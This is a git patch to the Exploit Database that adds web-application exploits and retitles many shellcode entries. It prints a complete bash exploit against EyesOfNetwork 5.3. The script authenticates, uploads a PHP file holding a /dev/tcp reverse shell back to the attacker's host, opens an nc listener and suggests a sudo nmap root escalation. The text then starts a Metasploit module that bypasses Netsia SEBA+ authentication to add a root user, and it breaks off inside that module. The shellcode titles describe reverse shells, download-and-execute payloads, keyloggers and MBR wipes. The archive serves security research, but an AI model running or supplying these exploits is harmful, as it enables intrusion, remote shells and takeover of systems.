From 969e7d6c903569251340738f23c4d02a631607d1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 16 Jan 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-01-16 13 changes to exploits/shellcodes Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS E-Learning System 1.0 - Authentication Bypass & RCE POC Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit) PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message) WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS) Online Hotel Reservation System 1.0 - 'description' Stored Cross-site Scripting Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF) Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection EyesOfNetwork 5.3 - File Upload Remote Code Execution BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes) BSD/x86 - execve(/bin/sh) + Encoded Shellcode (49 bytes) FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes) FreeBSD x86/x64 - execve(/bin/sh) + Anti-Debugging Shellcode (140 bytes) FreeBSD/x86 - setreuid() + execve(pfctl -d) Shellcode (56 bytes) FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes) FreeBSD/x86 - execve(/bin/sh) + Encoded Shellcode (48 bytes) Linux/PPC - read + exec Shellcode (32 bytes) Linux/PPC - read() + exec Shellcode (32 bytes) Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Append RSA Key To /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download File (cb) + Execute Shellcode (149 bytes) Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes) Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive + Payload Loader Shellcode (68+ bytes) BSD/x86 - symlink . /bin/sh Shellcode (32 bytes) BSD/x86 - symlink /bin/sh Shellcode (32 bytes) Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) Linux/x86 - Overwrite MBR On /dev/sda With _LOL!' Shellcode (43 bytes) Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes) Linux/x86 - Add Root User (toor) To /etc/passwd + No Password + exit() Shellcode (107 bytes) Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) Linux/x86 - execve(_/bin/sh__ _0__ _0_) With umask 16 (sys_umask(14)) Shellcode (45 bytes) Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) Linux/x64 - setuid(0) + chmod (/etc/passwd 0777) + exit(0) Shellcode (63 bytes) Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes) Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes) Linux/ARM - chmod(/etc/shadow 0777) + Polymorphic Shellcode (84 bytes) Linux/ARM - chmod(/etc/shadow 0777) Shellcode (35 bytes) Linux/x86 - Bind (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes) Linux/x86 - Bind (6778/TCP) Shell + Polymorphic + XOR Encoded Shellcode (125 bytes) Linux/ARM - Bind (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode Linux/ARM - Bind (0x1337/TCP) Listener + Receive + Payload Loader Shellcode Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) Linux/SuperH (sh4) - setuid(0) + chmod (/etc/shadow 0666) + exit(0) Shellcode (43 bytes) Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit) Windows - Download File + Execute Via DNS + IPv6 Shellcode (Generator) (Metasploit) Linux/MIPS (Little Endian) - system() Shellcode (80 bytes) Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid() + Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes) Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts Shellcode (77 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (77-85/90-98 bytes) Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator) Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes) Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes) Windows/x64 (XP) - Download File + Execute Shellcode Using PowerShell (Generator) Linux/MIPS (Little Endian) - chmod(/etc/shadow 666) Shellcode (55 bytes) Linux/MIPS (Little Endian) - chmod(/etc/passwd 666) Shellcode (55 bytes) Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes) Linux/x86 - execve(/bin/sh) + ROT13 Encoded Shellcode (68 bytes) Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes) Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts + Obfuscated Shellcode (98 bytes) Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator) Linux/x86 - Custom execve() + 'Followtheleader' Shellcode (Encoder/Decoder) (Generator) Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) Linux/x86 - mkdir(HACK) + chmod 777 + exit(0) Shellcode (29 bytes) Linux/x86 - Reboot() Shellcode (28 bytes) Linux/x86 - reboot() Shellcode (28 bytes) Linux/x64 - execve() Encoded Shellcode (57 bytes) Linux/x64 - execve() + Encoded Shellcode (57 bytes) Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) Windows/x86 - Download File (//192.168.1.19/c) Via WebDAV + Execute Null-Free Shellcode (96 bytes) Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes) Windows - Keylogger To File (./log.bin) + Null-Free Shellcode (431 bytes) Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes) Windows - Keylogger To File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes) BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator) Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing Via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes) Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes) BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes) BSD/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes) Linux/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes) BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (31 bytes) Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes) Linux/x86 - Audio (knock knock knock) Via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes) Linux/x86 - Remote File Download Shellcode (42 bytes) Linux/x86 - Download File Shellcode (42 bytes) Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes) Linux/x86 - reboot() + Mutated + Null-Free Shellcode (55 bytes) Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes) Linux/x86 - execve(wget) + Mutated + Null-Free Shellcode (96 bytes) Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes) Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes) Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes) Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + Execute Shellcode (108 bytes) Linux/x86 - execve(/bin/sh) Using jump/call/pop Shellcode (52 bytes) Linux/x86 - Copy /etc/passwd To /tmp/outfile Shellcode (97 bytes) Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) Linux/x64 - execve(/bin/sh -c reboot) Shellcode (89 bytes) Linux/x64 - mkdir() Shellcode (25 bytes) Linux/x64 - mkdir(ajit) Shellcode (25 bytes) IRIX - Bind (/TCP)Shell (/bin/sh) Shellcode (364 bytes) IRIX - Bind (/TCP) Shell (/bin/sh) Shellcode (364 bytes) Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes) Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes) Linux/ARM - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (79 bytes) Linux/ARM - chmod(/etc/passwd 0777) Shellcode (39 bytes) Linux/x64 - Execute /bin/sh Shellcode (27 bytes) Linux/x64 - execve(/bin/sh) Shellcode (27 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (110 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (96 bytes) Linux/x64 - shutdown -h now Shellcode (65 bytes) Linux/x64 - shutdown -h now Shellcode (64 bytes) Linux/x64 - /sbin/shutdown -h now Shellcode (65 bytes) Linux/x64 - /sbin/shutdown -h now Shellcode (64 bytes) Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator) Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes) Linux/x64 - execve(/bin/sh) + Custom Encoded XOR Shellcode Linux/x64 - execve(/bin/sh) + Custom Encoded XOR + Polymorphic Shellcode (Generator) Linux/x64 - execve(/bin/sh) + Twofish Encoded + DNS (CNAME) Password + Shellcode Linux/x86 - execve(/bin/sh) + NOT Encoder / Decoder Shellcode (44 bytes) Linux/x64 - x64 Assembly Shellcode (Generator) Linux/x64 - execve() Assembly Shellcode (Generator) Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes) Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (37 bytes) Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + (Dual IPv4 and IPv6) Shellcode (146 bytes) Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + IPv4/6 Shellcode (146 bytes) Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes) Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager Shellcode (28 Bytes) Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager Shellcode (20 Bytes) Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes) Linux/x86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes) Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes) Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (4 Bytes) Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes) Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse (192.168.2.157:31337/TCP) Shellcode (181 bytes) Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes) Linux/x86 - execve(/usr/bin/head -n99 cat etc/passwd) Shellcode (61 Bytes) Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes) Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator) Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + Execute Shellcode (119 bytes) Windows/x86 (XP Pro SP3) - Download File Via TFTP + Execute Shellcode (51-60 bytes) (Generator) Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes) Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes) Linux/ARM - Reverse (192.168.1.124:4321/TCP) Shell (/bin/sh) Shellcode (64 bytes) Windows/x86 - Download File (http://192.168.0.13/ms.msi) Via msiexec + Execute Shellcode (95 bytes) Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes) Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes) Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes) Linux/x86 - Add User (sshd/root) To /etc/passwd Shellcode (149 bytes) Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes) Linux/x86 - cat .bash_history + base64 Encode + cURL (http://localhost:8080) Shellcode (125 bytes) Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes) Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) Shellcode (91 Bytes) (Generator) Linux/x86 - Shred file (test.txt) Shellcode (72 bytes) Linux/x86 - Shred File (test.txt) Shellcode (72 bytes) Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes) Linux/x64 - execve(/bin/sh) Shellcode (23 bytes) Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes) Linux/x86 - execve(/bin/sh) + Reposition + INC Encoder Shellcode (66 bytes) Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes) Windows/x86 - Download File (http://192.168.10.10/evil.exe _c:\evil.exe_) Via bitsadmin + Execute Shellcode (210 Bytes) Linux/x86 - Chmod + Execute (/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes) Linux/x86 - chmod + execute(/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes) Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes) Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (140 bytes) Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes) Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes) Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) + mmap() + read() Stager Shellcode (60 Bytes) Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (8 Bytes) Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) Using JMP-CALL-POP Shellcode (21 bytes) Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes) Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes) Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes) Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes) Linux/x86 - chmod(/etc/shadow_ 0666) + Polymorphic Shellcode (53 bytes) Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (107 bytes) Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes) Linux/x86_64 - execve(_/bin/sh_) + AVX2 XOR Decoder Shellcode (62 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes) Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes) Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (107 Bytes) Linux/x86 - Bind (43690/TCP) + Null-Free Shellcode (53 Bytes) Linux/x86 - execve(/bin/sh) + NOT + XOR-N + Random Encoded Shellcode (132 bytes) Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes) Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) Windows/7 - Screen Lock Shellcode (9 bytes) Linux/x86 - Add Root User (vl43ck/test) To /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) To /etc/passwd Shellcode (74 bytes) Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) Socket Reuse Shellcode (42 bytes) Linux/x86 - execve(/bin/sh) + NOT|ROT+8 Encoded + Null-Free Shellcode (47 bytes) Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Free Shellcode (188 bytes) Linux/x86 - execve() + Alphanumeric Shellcode (66 bytes) Linux/x86 - execve(/bin/sh) + Random Bytes Encoder + XOR/SUB/NOT/ROR Shellcode (114 bytes) Windows/x64 (7) - Screen Lock Shellcode (9 bytes) Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes) Windows/x86 - WinExec Calc.exe + Null-Free Shellcode (195 bytes) Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes) Linux/x86 - Reboot + Polymorphic Shellcode (26 bytes) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) Linux/ARM - execve /bin/dash Shellcode (32 bytes) Windows/x86 - MSVCRT System + Dynamic Null-Free + Add RDP Admin (MajinBuu/TurnU2C@ndy!!) + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Password (P3WP3Wl4ZerZ) + Null-free Shellcode (272 Bytes) Linux/ARM - execve(/bin/dash) Shellcode (32 bytes) Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes) Windows/x86 - Download using mshta.exe Shellcode (100 bytes) Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes) --- exploits/multiple/webapps/49432.sh | 132 +++++++++++ exploits/multiple/webapps/49435.rb | 112 +++++++++ exploits/php/webapps/49426.html | 26 ++ exploits/php/webapps/49427.txt | 22 ++ exploits/php/webapps/49428.txt | 22 ++ exploits/php/webapps/49429.txt | 25 ++ exploits/php/webapps/49430.txt | 33 +++ exploits/php/webapps/49431.txt | 34 +++ exploits/php/webapps/49433.txt | 14 ++ exploits/php/webapps/49434.py | 93 ++++++++ files_exploits.csv | 10 + files_shellcodes.csv | 224 +++++++++--------- .../{windows => windows_x86-64}/47953.c | 0 13 files changed, 635 insertions(+), 112 deletions(-) create mode 100755 exploits/multiple/webapps/49432.sh create mode 100755 exploits/multiple/webapps/49435.rb create mode 100644 exploits/php/webapps/49426.html create mode 100644 exploits/php/webapps/49427.txt create mode 100644 exploits/php/webapps/49428.txt create mode 100644 exploits/php/webapps/49429.txt create mode 100644 exploits/php/webapps/49430.txt create mode 100644 exploits/php/webapps/49431.txt create mode 100644 exploits/php/webapps/49433.txt create mode 100755 exploits/php/webapps/49434.py rename shellcodes/{windows => windows_x86-64}/47953.c (100%) diff --git a/exploits/multiple/webapps/49432.sh b/exploits/multiple/webapps/49432.sh new file mode 100755 index 000000000..6a5a1afe2 --- /dev/null +++ b/exploits/multiple/webapps/49432.sh @@ -0,0 +1,132 @@ +# Exploit Title: EyesOfNetwork 5.3 - File Upload Remote Code Execution +# Date: 10/01/2021 +# Exploit Author: Ariane.Blow +# Vendor Homepage: https://www.eyesofnetwork.com/en +# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso +# Version: 5.3-10 (12/9/2020-lastest) + +#!/bin/bash + +# (/!\) You may have change this string : "user_id=1; user_limitation=0; group_id=1" if you are not the admin user in the admin group, you find this in the cookies params /!\ + +############################################### +# (Authentified) # +# Abritraty file upload # +# It whase a Challenge to do that in BASH # +# But the exploit's working fine ! # +# ........... # +# Exploit is working with the actual version # +# Scripted on 01/10/2021 # +# By Ariane.Blow # +# https://ariane.agency/ # +############################################### +banner() +{ +clear +echo " ,*-." +echo ' | |' +echo ' ,. | |' +echo ' | |_| | ,.' +echo ' `---. |_| |' +echo ' | .--`' +echo " | |" +echo " | |" +echo ""Ω +echo " ! DO NOT USE IF YOU DONT HAVE PERSMISSION !" +echo "" +echo " EyesOfNetwork 5.3-10" +echo "" +echo " RedTeam Tool" +echo "" +echo " Input verification desertion" +echo "" +echo " RCE via Arbitrary FileUpload" +echo "" +echo "" +} +VAR() +{ +#var +#Beacause I don't whant to see all the *.sh in my OPT directory ... BashMan Tips xD ! +mkdir /tmp/EON53 +cd /tmp/EON53 +#you can not upload more than 1 file with a same URL and same filename, i just add a random char at the end of URL and in the filename +export random=$(cat /dev/urandom | tr -dc 'bcdfghjklmnpqrstvwxz' | head -c 9) +export filename=shell$random.xml.php +echo "EyesOfNetwork IP :" +read eonIP +echo "HackerIP (used to start the listener) :" +read hackerIP +echo "Hacker PORT (used to start the listener):" +read PORT +echo "Username (default = admin) :" +read username +echo "password :" +read password +} +#Getting the session_id +GetSessionID() +{ +echo "getting sessionID ... " +echo "curl -i -s -k -X $'POST' -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://$eonIP/login.php' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 20' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' --data-binary $'login=$username&mdp=$password' $'https://$eonIP/login.php' | grep session | cut -d ';' -f 1 | cut -d '=' -f 2" >> GetSession.sh +chmod +x GetSession.sh +sessionID=$(./GetSession.sh) +echo "sessionID acquired : $sessionID" +sleep 3 +echo +} +#start listener +start_listen() +{ +printf "\e[31;1m When the Reverse-Shell is etablished, you can PrivEsc with :\e[0m \n" +echo "echo 'os.execute(\"/bin/sh\")' > /tmp/nmap.script" +echo "sudo nmap --script=/tmp/nmap.script" +printf "\e[31;1m ... I Know ... \e[0m \n" +echo "gnome-terminal -e 'nc -lnvp $PORT'" >> listen.sh +chmod +x listen.sh +./listen.sh +} +#POST payload +Payload() +{ +echo "Sending PostRequest ..." +echo "curl -i -s -k -X $'POST' \ + -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: multipart/form-data; boundary=---------------------------123135855827554554412483984802' -H $'Content-Length: 1565' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Referer: https://$eonIP/module/admin_itsm/modification_itsm.php' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ + -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ + --data-binary $'-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url_id\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url\"\x0d\x0a\x0d\x0ahttp://HackMe.ImFamous$random\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"fileName\"; filename=\"$filename\"\x0d\x0aContent-Type: text/xml\x0d\x0a\x0a /dev/tcp/$hackerIP/$PORT 0>&1\'\");\x0a\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"input_file_name\"\x0d\x0a\x0d\x0ashell.xml\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_type_request\"\x0d\x0a\x0d\x0aget\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_header[]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][var_name]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][champ_ged_id]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_parent\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_return_champ\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0aadd_external_itsm\x0d\x0a-----------------------------123135855827554554412483984802--\x0d\x0a' \ + $'https://$eonIP/module/admin_itsm/ajax.php' | grep success" >> req.sh +chmod +x req.sh +./req.sh +} +#Get request on PHP exploit +Req_payload() +{ +echo "Get request on the PHP payload ..." +echo "curl -i -s -k -X $'GET' \ + -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' \ + -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ + $'https://$eonIP/module/admin_itsm/uploaded_file/$filename'" >> reqGET.sh + +chmod +x reqGET.sh +./reqGET.sh +} +#Clearing +Clear_cache() +{ +echo "clearing cache" +rm listen.sh +rm req.sh +rm reqGET.sh +rm GetSession.sh +cd .. +rmdir EON53 +} + +#MAIN +banner +VAR +GetSessionID +start_listen +Payload +Req_payload +Clear_cache \ No newline at end of file diff --git a/exploits/multiple/webapps/49435.rb b/exploits/multiple/webapps/49435.rb new file mode 100755 index 000000000..03ba3a5ce --- /dev/null +++ b/exploits/multiple/webapps/49435.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' , + 'Description' => %q{ + This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user. + HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user, + can be performed without the need for any session(cookie) information. + Therefore, the session cookie informations of the active users in the application can be read from the response content. + A new authorized user can be created with the obtained cookie. + }, + 'References' => + [ + [ 'CVE', '' ], + [ 'URL', 